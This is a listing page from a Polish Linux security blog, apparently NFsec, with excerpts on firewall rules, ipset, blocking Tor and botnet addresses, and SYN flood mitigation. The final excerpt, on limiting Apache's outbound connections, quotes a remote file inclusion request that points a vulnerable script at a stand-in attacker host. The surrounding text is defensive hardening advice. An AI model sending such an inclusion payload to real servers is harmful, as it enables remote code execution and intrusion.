NFsec Logo

Nasłuch na wszystkich adresach IP i wszystkich portach

29/06/2018 w Administracja Możliwość komentowania Nasłuch na wszystkich adresach IP i wszystkich portach została wyłączona

A

ny-IP w Linuksie to możliwość odbierania pakietów i nawiązywania połączeń przychodzących na adresy IP, które nie są jeszcze skonfigurowane na hoście. Umożliwia to skonfigurowanie serwera, aby odpowiadał w określonym zakresie adresacji sieciowej jakby była ona lokalną – bez konieczności konfigurowania adresów na interfejsie. Dla przykładu: chcemy, aby nasza maszyna odpowiadała dla całej adresacji 192.168.0.0/24 bez konieczności konfiguracji każdego adresu IP na interfejsie/sach.
[ czytaj całość… ]

Blokujemy sieć Facebook lub inną firmę posiadającą Autonomous System

01/06/2016 w Hacks & Scripts Możliwość komentowania Blokujemy sieć Facebook lub inną firmę posiadającą Autonomous System została wyłączona

F

acebook będzie teraz wyświetlał reklamy nawet użytkownikom, którzy nie są zarejestrowani w jego sieci społecznościowej. Może by tak zablokować ich całą sieć? Jak to zrobić najprościej? Wystarczy znaleźć system autonomiczny danej firmy i wyciągnąć z niego całe bloki sieci, które można dodać do reguł blokujących na ścianie ogniowej.
[ czytaj całość… ]

Blokujemy sieci tor i botnety ransomware

13/05/2016 w Bezpieczeństwo, Hacks & Scripts Możliwość komentowania Blokujemy sieci tor i botnety ransomware została wyłączona

Współczesne, szkodliwe oprogramowanie komunikuje się z swoimi serwerami C&C (command and control) za pomocą sieci Tor. Jeśli chcemy ochronić naszą firmową / domową sieć przed różnego rodzaju malware / ransomware lub atakami pochodzącymi z wyjściowych węzłów Tor to możemy do tego wykorzystać takie serwisy, jak Ransomware Tracker, Feodo Tracker oraz Tor Network Status, które dostarczają gotowe listy z adresami IP, które mogą zostać wykorzystane do budowy blokady:
[ czytaj całość… ]

Fałszujemy rozpoznania skanerów #1

29/12/2015 w Bezpieczeństwo, Pen Test Możliwość komentowania Fałszujemy rozpoznania skanerów #1 została wyłączona

I

stnieje wiele poradników, instrukcji i tutoriali, jak korzystać z skanerów bezpieczeństwa, które pozwalają na szybkie zweryfikowanie pentesterom zewnętrznego bezpieczeństwa serwerów. Najbardziej znanym jest chyba nmap. Decydując się na tego typu automat należy pamiętać, że to są tylko automaty, a wyniki ich pracy powstają tylko i wyłącznie na interpretacji surowych danych przychodzących po wyzwoleniu określonej akcji. Narzędzia tego typu nie myślą. Spodziewają się pewnych zachowań od systemów i na ich podstawie tworzą jakieś założenia. Jeśli sobie tego nie uświadomimy bardzo szybko możemy nabrać się na fałszywe alarmy oraz utratę cennego czasu przy opracowywaniu raportu bezpieczeństwa.
[ czytaj całość… ]

Łagodzenie ataków SYN oraz ACK flood cz.II

24/10/2015 w Bezpieczeństwo 1 komentarz.

N

o właśnie, co z tymi pakietami SYN? Tutaj ponownie pojawia się problem skalowalności systemu conntrack (tak jak dla stanu listen) dla tworzenia (lub usuwania) połączeń, które spowoduje zalew pakietów SYN. Nawet jeśli uporamy się z blokadą w warstwie conntrack to kolejnym krokiem wędrówki pakietu SYN będzie stworzenie gniazda w trybie „nasłuchu”, czyli kolejną barierą wydajnościową. Normalnym procesem łagodzenia tego typu pakietów w systemie Linux będzie mechanizm SYN-cookies, który również ma ograniczenia.
[ czytaj całość… ]

Łagodzenie ataków SYN oraz ACK flood cz.I

22/07/2015 w Bezpieczeństwo Możliwość komentowania Łagodzenie ataków SYN oraz ACK flood cz.I została wyłączona

P

odstawowy problem skalowalności protokołu TCP w jądrze Linuksa jest związany z liczbą nowych połączeń, jakie mogą być tworzone na sekundę. Odnosi się to bezpośrednio do obsługi gniazd powstających w trybie nasłuchu, które są blokowane. Blokady powodowane są nie tylko przez pakiety z flagą SYN, ale także SYN-ACK oraz ACK (ostatni w potrójnym uścisku dłoni). Podczas ataków DoS / DDoS za pomocą tego rodzaju pakietów atakujący ma na celu wysłanie, jak największej ilości spreparowanych pakietów, które mają na celu osiągnąć i spowodować problem z blokowaniem gniazd w trybie nasłuchu. Jedną z metod jest podniesienie bardzo niskiego limitu dla tego typu gniazd oraz kolejki oczekujących połączeń w systemie:
[ czytaj całość… ]

Blokowanie zapytań DNS za pomocą iptables

29/11/2014 w Administracja Możliwość komentowania Blokowanie zapytań DNS za pomocą iptables została wyłączona

Z

ałóżmy, że do naszego serwera DNS, który jest otwarty tylko dla sieci wewnętrznej zaczyna przychodzić niechciany ruch (od setek do tysięcy zapytań na sekundę) pochodzący od szkodliwego oprogramowania / złej konfiguracji serwerów. W zależności od oprogramowania jakiego używamy do obsługi zapytań DNS – zablokowanie konkretnego rodzaju zapytań może stać się dość trudne. Pierwszym rozwiązaniem tego problemu wydaje się zablokowanie wszystkich żądań DNS, które posiadają konkretne wyrażenie w zawartości pakietu.
[ czytaj całość… ]

Rozszerzenie ipset dla iptables

08/11/2014 w Bezpieczeństwo Możliwość komentowania Rozszerzenie ipset dla iptables została wyłączona

P

rzez długi czas firewall w Linuksie oparty o iptables nie miał żadnego efektywnego sposobu, aby dopasowywać reguły do zbiorów adresów IP. Jeśli mieliśmy wiele adresów IP, aby dopasować do nich różne reguły (na przykład: setki lub tysiące adresów IP, które należało trzymać z daleka od portu SMTP) trzeba było tworzyć jeden wpis iptables dla każdego adresu IP, a następnie wprowadzać te wpisy sekwencyjnie. To wprowadzało wiele komplikacji w utrzymywanie takiego rozwiązania. Na szczęście w jądrach od serii 2.6.39 (Ubuntu 12.04, 14.04, Fedora 20, RHEL / CentOS 7) pojawiło się rozszerzenie ipset.
[ czytaj całość… ]

Ograniczanie dostępu do MongoDB w środowisku chmury

23/12/2013 w Administracja, Bezpieczeństwo Możliwość komentowania Ograniczanie dostępu do MongoDB w środowisku chmury została wyłączona

A

ktualnie baza MongoDB (v2.4.8) nie posiada możliwości ograniczenia dostępu do wybranych adresów IP na poziomie warstwy aplikacji. Mechanizmem, który można szybko do tego wykorzystać jest netfilter. Daje się on szybko dostosować szczególnie w środowisku wirtualizacji, w którym maszyna wirtualna posiada zmienny, wewnętrzny adres IP na interfejsie eth0 – a jej zewnętrzny adres przechodzi przez mechanizm NAT.
[ czytaj całość… ]

Apache – blokowanie połączeń wychodzących aplikacji z iptables

25/11/2013 w Bezpieczeństwo Możliwość komentowania Apache – blokowanie połączeń wychodzących aplikacji z iptables została wyłączona

S

erwer WWW głównie akceptuje połączenia przychodzące od użytkowników, a sam niekiedy potrzebuje nawiązać nowe połączenia z zewnętrznymi zasobami np. bazą danych. Dlatego dobrze znając architekturę aplikacji – warto ograniczyć jej połączenia wychodzące tylko do tych, które są jej rzeczywiście niezbędne. To sprawia, że tak wyprofilowana sieciowo aplikacja staje się trudniejsza do zdobycia na przykład przez atakującego, który chce wykorzystać atak z wykorzystaniem zewnętrznych zasobów:

/podatny_kod.php?bug=http://evilhacker.net/exploit?

[ czytaj całość… ]